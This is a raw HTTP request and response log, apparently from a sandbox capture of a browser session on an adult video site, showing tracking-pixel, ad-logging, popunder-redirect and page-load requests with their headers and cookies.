sec-fetch-dest: empty
referer: https://www.pornhub.com/?utm_source=PPORNHUB.COM&utm_medium=redirects&utm_campaign=tldredirects
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: cookieConsent=1

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:01 GMT
content-type: image/gif
content-length: 43
access-control-allow-headers: Content-Type
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
access-control-max-age: 86400
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
expires: Sun, 22 Jan 1984 03:00:00 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
pragma: no-cache
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/deep_pixel?info=CiQxNDczZDhiNC0xMWE4LTRjY2ItOGQ1YS1kMzVkMzc0NThmMGEQ8MaFuAYaIjIzOTdhZmRmMWZiZTRiYWNiNDRlMDhlMGY5ZDFlNWRhLTEgAjAFOAVAtZEXSNnDz%2BADUgEyWNXrqd4DYIe7tYMEgQHxaOOItfjkPpIBAk5MygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w%2BgEMMTkyLjQyLjExNi4wggIHZGVkNzUyMYgCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCld2A3AfgAunQsp8E%2BgIBMYIDX3siYWN0b3JfaWQiOm51bGwsImNvbnRlbnRfdHlwZSI6bnVsbCwidmlkZW9faWQiOm51bGwsImhhc2giOiJlYjRkMmFjMGY0YTAyYmI5Njc5YmJlYmFkNzVmNjU4MiJ9kgMHZGVza3RvcJoDAmVuqAMBwgMEaG9tZZIEEEF5bG8gUHJlbWl1bSBMdGSYBAGgBAGoBAGyBAIDAdgENw%3D%3D&noc=1&not=1&ua=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F92.0.4515.131+Safari%2F537.36+Edg%2F92.0.902.67

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/deep_pixel?info=CiQxNDczZDhiNC0xMWE4LTRjY2ItOGQ1YS1kMzVkMzc0NThmMGEQ8MaFuAYaIjIzOTdhZmRmMWZiZTRiYWNiNDRlMDhlMGY5ZDFlNWRhLTEgAjAFOAVAtZEXSNnDz%2BADUgEyWNXrqd4DYIe7tYMEgQHxaOOItfjkPpIBAk5MygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w%2BgEMMTkyLjQyLjExNi4wggIHZGVkNzUyMYgCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCld2A3AfgAunQsp8E%2BgIBMYIDX3siYWN0b3JfaWQiOm51bGwsImNvbnRlbnRfdHlwZSI6bnVsbCwidmlkZW9faWQiOm51bGwsImhhc2giOiJlYjRkMmFjMGY0YTAyYmI5Njc5YmJlYmFkNzVmNjU4MiJ9kgMHZGVza3RvcJoDAmVuqAMBwgMEaG9tZZIEEEF5bG8gUHJlbWl1bSBMdGSYBAGgBAGoBAGyBAIDAdgENw%3D%3D&noc=1&not=1&ua=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F92.0.4515.131+Safari%2F537.36+Edg%2F92.0.902.67 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.pornhub.com/?utm_source=PPORNHUB.COM&utm_medium=redirects&utm_campaign=tldredirects
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: cookieConsent=1

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:01 GMT
content-type: text/html; charset=UTF-8
x-frame-options: SAMEORIGIN
cache-control: no-cache, no-store, must-revalidate
vary: User-Agent
rating: RTA-5042-1996-1400-1577-RTA
content-encoding: br
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/deep_pixel?info=CiQzYjA3NjFlNC1jOTk2LTQ0NjUtODlhMi00NTI5MjRkMTkwZWEQ8MaFuAYaIjIzOTdhZmRmMWZiZTRiYWNiNDRlMDhlMGY5ZDFlNWRhLTIgAjCfqYUBOJ%2BphQFA%2FfgESJOY4t8DUgEyWNXrqd4DYKu0yvIDgQGL4H8r2bEhP5IBAk5MygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w%2BgEMMTkyLjQyLjExNi4wggIHZGVkNzUyMYgCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCha%2BE0gXgAref55UE%2BgIBMYIDX3siYWN0b3JfaWQiOm51bGwsImNvbnRlbnRfdHlwZSI6bnVsbCwidmlkZW9faWQiOm51bGwsImhhc2giOiJlYjRkMmFjMGY0YTAyYmI5Njc5YmJlYmFkNzVmNjU4MiJ9kgMHZGVza3RvcJoDAmVuqAMBwgMEaG9tZZIEEEF5bG8gUHJlbWl1bSBMdGSYBAGgBAGoBAGyBAIDAdgENw%3D%3D&noc=1&not=1&ua=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F92.0.4515.131+Safari%2F537.36+Edg%2F92.0.902.67

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/deep_pixel?info=CiQzYjA3NjFlNC1jOTk2LTQ0NjUtODlhMi00NTI5MjRkMTkwZWEQ8MaFuAYaIjIzOTdhZmRmMWZiZTRiYWNiNDRlMDhlMGY5ZDFlNWRhLTIgAjCfqYUBOJ%2BphQFA%2FfgESJOY4t8DUgEyWNXrqd4DYKu0yvIDgQGL4H8r2bEhP5IBAk5MygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w%2BgEMMTkyLjQyLjExNi4wggIHZGVkNzUyMYgCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCha%2BE0gXgAref55UE%2BgIBMYIDX3siYWN0b3JfaWQiOm51bGwsImNvbnRlbnRfdHlwZSI6bnVsbCwidmlkZW9faWQiOm51bGwsImhhc2giOiJlYjRkMmFjMGY0YTAyYmI5Njc5YmJlYmFkNzVmNjU4MiJ9kgMHZGVza3RvcJoDAmVuqAMBwgMEaG9tZZIEEEF5bG8gUHJlbWl1bSBMdGSYBAGgBAGoBAGyBAIDAdgENw%3D%3D&noc=1&not=1&ua=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F92.0.4515.131+Safari%2F537.36+Edg%2F92.0.902.67 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.pornhub.com/?utm_source=PPORNHUB.COM&utm_medium=redirects&utm_campaign=tldredirects
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: cookieConsent=1

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:01 GMT
content-type: image/gif
content-length: 43
access-control-allow-headers: Content-Type
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
access-control-max-age: 86400
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
expires: Sun, 22 Jan 1984 03:00:00 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
pragma: no-cache
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/fla/log?action=ad_view&ad_id=1045600811&campaign_id=1006144531&initial_zone_id=2184351&member_id=1003124181&zone_id=2184351

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/fla/log?action=ad_view&ad_id=1045600811&campaign_id=1006144531&initial_zone_id=2184351&member_id=1003124181&zone_id=2184351 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.pornhub.com/?utm_source=PPORNHUB.COM&utm_medium=redirects&utm_campaign=tldredirects
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: cookieConsent=1

Response

HTTP/2.0 200

server: nginx
date: Sat, 05 Oct 2024 16:04:02 GMT
content-length: 0
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
POST

https://www.pornhub.com/_i?type=event&event=enter&origin=homepage&origin_url=%2F%3Futm_source%3DPPORNHUB.COM%26amp%3Butm_medium%3Dredirects%26amp%3Butm_campaign%3Dtldredirects&origin_item_id=age%20modal%20enter

msedge.exe

Remote address:

66.254.114.41:443

Request

POST /_i?type=event&event=enter&origin=homepage&origin_url=%2F%3Futm_source%3DPPORNHUB.COM%26amp%3Butm_medium%3Dredirects%26amp%3Butm_campaign%3Dtldredirects&origin_item_id=age%20modal%20enter HTTP/2.0
host: www.pornhub.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
x-requested-with: XMLHttpRequest
content-type: application/x-www-form-urlencoded; charset=UTF-8
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/?utm_source=PPORNHUB.COM&utm_medium=redirects&utm_campaign=tldredirects
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: cookieConsent=1

Response

HTTP/2.0 200

content-length: 0
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/service-worker.js

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /service-worker.js HTTP/2.0
host: www.pornhub.com
cache-control: max-age=0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
service-worker: script
sec-fetch-site: same-origin
sec-fetch-mode: same-origin
sec-fetch-dest: serviceworker
referer: https://www.pornhub.com/?utm_source=PPORNHUB.COM&utm_medium=redirects&utm_campaign=tldredirects
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: cookieConsent=1
cookie: accessAgeDisclaimerPH=1

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:03 GMT
content-type: application/javascript
content-length: 683
last-modified: Thu, 03 Oct 2024 20:40:04 GMT
etag: "66ff0124-2ab"
x-frame-options: SAMEORIGIN
expires: Sun, 02 Feb 2025 16:04:03 GMT
cache-control: max-age=10368000
pragma: public
cache-control: public
accept-ranges: bytes
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
POST

https://www.pornhub.com/_i?type=event&event=accept-all&origin=homepage&origin_url=%2F%3Futm_source%3DPPORNHUB.COM%26amp%3Butm_medium%3Dredirects%26amp%3Butm_campaign%3Dtldredirects

msedge.exe

Remote address:

66.254.114.41:443

Request

POST /_i?type=event&event=accept-all&origin=homepage&origin_url=%2F%3Futm_source%3DPPORNHUB.COM%26amp%3Butm_medium%3Dredirects%26amp%3Butm_campaign%3Dtldredirects HTTP/2.0
host: www.pornhub.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
x-requested-with: XMLHttpRequest
content-type: application/x-www-form-urlencoded; charset=UTF-8
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/?utm_source=PPORNHUB.COM&utm_medium=redirects&utm_campaign=tldredirects
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.0.1728144245.60.0.0
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c

Response

HTTP/2.0 200

content-length: 0
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/ads?zone_id=1970821&redirect=1&format=popunder&clientType=pc&channel[site]=pornhub&channel[context_page_type]=home&channel[info]=%7B%22actor_id%22%3Anull%2C%22content_type%22%3Anull%2C%22video_id%22%3Anull%2C%22timestamp%22%3A1728144239%2C%22hash%22%3A%22eb4d2ac0f4a02bb9679bbebad75f6582%22%7D&hc=8EFE4FB5-4C03-49C6-843F-FFAFD4310E98&device_type=pc&site_id=2&dm=www.pornhub.com%2F_xa&_=1728144240870&noc=1

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/ads?zone_id=1970821&redirect=1&format=popunder&clientType=pc&channel[site]=pornhub&channel[context_page_type]=home&channel[info]=%7B%22actor_id%22%3Anull%2C%22content_type%22%3Anull%2C%22video_id%22%3Anull%2C%22timestamp%22%3A1728144239%2C%22hash%22%3A%22eb4d2ac0f4a02bb9679bbebad75f6582%22%7D&hc=8EFE4FB5-4C03-49C6-843F-FFAFD4310E98&device_type=pc&site_id=2&dm=www.pornhub.com%2F_xa&_=1728144240870&noc=1 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-dest: document
referer: https://www.pornhub.com/?utm_source=PPORNHUB.COM&utm_medium=redirects&utm_campaign=tldredirects
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.0.1728144245.60.0.0
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030

Response

HTTP/2.0 302

server: openresty
date: Sat, 05 Oct 2024 16:04:16 GMT
content-length: 0
cache-control: private, no-cache, proxy-revalidate, no-store, max-age=0
location: https://www.pornhub.com/_xa/deep_click?adtype=pop&h=64208cc401e47e1c676f2b1331cd29a4ba54aa2a&info=CiQ2ZTgxOWYwMi1mYWVkLTQzNTItOWY3MC1mODRlMDRlNTdiY2YQgMeFuAYaIjlmMjE0YzBkYjlkYjRiNzc4MTg3MDE3OTA1MzE2ZDkzLTEgAigBMIWleDiFpXhAgb4VSOunjeADUgEyWJf4kN0DYI%2BZp%2FQDgQG4HoXrUbh%2BP5IBAk5MygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w%2BgEMMTkyLjQyLjExNi4wggIHZGVkNzY1NYgCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCwauD5AXgAseWuZoE%2BgIBMYIDX3siYWN0b3JfaWQiOm51bGwsImNvbnRlbnRfdHlwZSI6bnVsbCwidmlkZW9faWQiOm51bGwsImhhc2giOiJlYjRkMmFjMGY0YTAyYmI5Njc5YmJlYmFkNzVmNjU4MiJ9kgMHZGVza3RvcJoDAmVuqAMBwgMEaG9tZZIED1NlbnNlbWFrZXJzIEIuVpgEAaAEAagEAbIEAQPYBBk%3D&noc=1&not=1&url=https%253A%252F%252Ftrack.thuis.nl%252Fb2b6dee2-f71a-46f0-83a8-1a6c621fe26d%253FCampaignID%253D1006851051%2526SpotName%253DPornhub%252520PC-%252520Popunder%2526BLPName%253D%2526SiteName%253DPornhub&x=1
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-allow-methods: GET,POST
access-control-allow-headers: Content-Type
access-control-max-age: 86400
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /view_video.php?viewkey=66e6fe092a6e2 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-dest: document
referer: https://www.pornhub.com/?utm_source=PPORNHUB.COM&utm_medium=redirects&utm_campaign=tldredirects
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.0.1728144245.60.0.0
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:16 GMT
content-type: text/html; charset=UTF-8
set-cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676; expires=Sun, 06 Oct 2024 16:04:16 GMT; Max-Age=86400; path=/; domain=pornhub.com; secure
set-cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c; expires=Sun, 05 Oct 2025 16:04:16 GMT; Max-Age=31536000; path=/; domain=pornhub.com; secure; SameSite=None
set-cookie: sessid=210441633134242866; expires=Sun, 05 Oct 2025 16:04:16 GMT; Max-Age=31536000; path=/; domain=pornhub.com; secure
set-cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000; expires=Mon, 04 Nov 2024 16:04:16 GMT; Max-Age=2592000; path=/; domain=pornhub.com; secure
set-cookie: lvv=590947103776240458; expires=Sun, 05 Oct 2025 16:04:16 GMT; Max-Age=31536000; path=/; domain=pornhub.com; secure
set-cookie: vlc=906975376049642497; expires=Sun, 05 Oct 2025 16:04:16 GMT; Max-Age=31536000; path=/; domain=pornhub.com; secure
x-frame-options: SAMEORIGIN
cache-control: no-cache, no-store, must-revalidate
vary: User-Agent
rating: RTA-5042-1996-1400-1577-RTA
content-encoding: br
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/deep_click?adtype=pop&h=64208cc401e47e1c676f2b1331cd29a4ba54aa2a&info=CiQ2ZTgxOWYwMi1mYWVkLTQzNTItOWY3MC1mODRlMDRlNTdiY2YQgMeFuAYaIjlmMjE0YzBkYjlkYjRiNzc4MTg3MDE3OTA1MzE2ZDkzLTEgAigBMIWleDiFpXhAgb4VSOunjeADUgEyWJf4kN0DYI%2BZp%2FQDgQG4HoXrUbh%2BP5IBAk5MygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w%2BgEMMTkyLjQyLjExNi4wggIHZGVkNzY1NYgCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCwauD5AXgAseWuZoE%2BgIBMYIDX3siYWN0b3JfaWQiOm51bGwsImNvbnRlbnRfdHlwZSI6bnVsbCwidmlkZW9faWQiOm51bGwsImhhc2giOiJlYjRkMmFjMGY0YTAyYmI5Njc5YmJlYmFkNzVmNjU4MiJ9kgMHZGVza3RvcJoDAmVuqAMBwgMEaG9tZZIED1NlbnNlbWFrZXJzIEIuVpgEAaAEAagEAbIEAQPYBBk%3D&noc=1&not=1&url=https%253A%252F%252Ftrack.thuis.nl%252Fb2b6dee2-f71a-46f0-83a8-1a6c621fe26d%253FCampaignID%253D1006851051%2526SpotName%253DPornhub%252520PC-%252520Popunder%2526BLPName%253D%2526SiteName%253DPornhub&x=1

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/deep_click?adtype=pop&h=64208cc401e47e1c676f2b1331cd29a4ba54aa2a&info=CiQ2ZTgxOWYwMi1mYWVkLTQzNTItOWY3MC1mODRlMDRlNTdiY2YQgMeFuAYaIjlmMjE0YzBkYjlkYjRiNzc4MTg3MDE3OTA1MzE2ZDkzLTEgAigBMIWleDiFpXhAgb4VSOunjeADUgEyWJf4kN0DYI%2BZp%2FQDgQG4HoXrUbh%2BP5IBAk5MygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w%2BgEMMTkyLjQyLjExNi4wggIHZGVkNzY1NYgCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCwauD5AXgAseWuZoE%2BgIBMYIDX3siYWN0b3JfaWQiOm51bGwsImNvbnRlbnRfdHlwZSI6bnVsbCwidmlkZW9faWQiOm51bGwsImhhc2giOiJlYjRkMmFjMGY0YTAyYmI5Njc5YmJlYmFkNzVmNjU4MiJ9kgMHZGVza3RvcJoDAmVuqAMBwgMEaG9tZZIED1NlbnNlbWFrZXJzIEIuVpgEAaAEAagEAbIEAQPYBBk%3D&noc=1&not=1&url=https%253A%252F%252Ftrack.thuis.nl%252Fb2b6dee2-f71a-46f0-83a8-1a6c621fe26d%253FCampaignID%253D1006851051%2526SpotName%253DPornhub%252520PC-%252520Popunder%2526BLPName%253D%2526SiteName%253DPornhub&x=1 HTTP/2.0
host: www.pornhub.com
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
referer: https://www.pornhub.com/?utm_source=PPORNHUB.COM&utm_medium=redirects&utm_campaign=tldredirects
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.0.1728144245.60.0.0
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030

Response

HTTP/2.0 302

server: openresty
date: Sat, 05 Oct 2024 16:04:16 GMT
content-type: text/html; charset=utf-8
content-length: 176
access-control-allow-origin: *
location: https://track.thuis.nl/b2b6dee2-f71a-46f0-83a8-1a6c621fe26d?CampaignID=1006851051&SpotName=Pornhub%20PC-%20Popunder&BLPName=&SiteName=Pornhub
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

